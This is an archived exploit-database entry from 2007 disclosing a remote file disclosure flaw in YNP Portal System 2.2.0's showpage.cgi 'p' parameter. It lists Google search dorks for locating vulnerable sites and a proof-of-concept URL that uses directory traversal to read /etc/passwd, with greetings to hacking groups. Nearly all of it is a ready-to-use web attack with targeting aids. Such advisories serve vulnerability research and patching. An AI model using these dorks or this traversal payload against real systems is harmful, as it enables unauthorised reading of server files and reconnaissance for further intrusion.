YNP Portal System 2.2.0 - 'showpage.cgi p' Remote File Disclosure

EDB-ID:

4261

Author:

GoLd_M

Type:

webapps

Platform:

CGI

Published:

2007-08-06

#################################################################################
# YNP Portal System 2.2.0 (showpage.cgi p) Remote File Disclosure Vulnerability #
# D0RK : inurl:"showpage.cgi?p=popsearch.html"                               #
#      : inurl:"showpage.cgi?p=support.html"                                 #
#      : inurl:"showpage.cgi?p=dialup.html"                                  #
#      : inurl:"showpage.cgi?p="                                             #
# POC: http://xxxx.com/showpage.cgi?p=../../../../../../etc/passwd           #
# Discovered by: GolD_M = [Mahmood_ali]                                      #
# Thanx To : Tryag-Team & Asbmay's Group & bd0rk & Cold Zero & All My Friends   #
#################################################################################

# milw0rm.com [2007-08-06]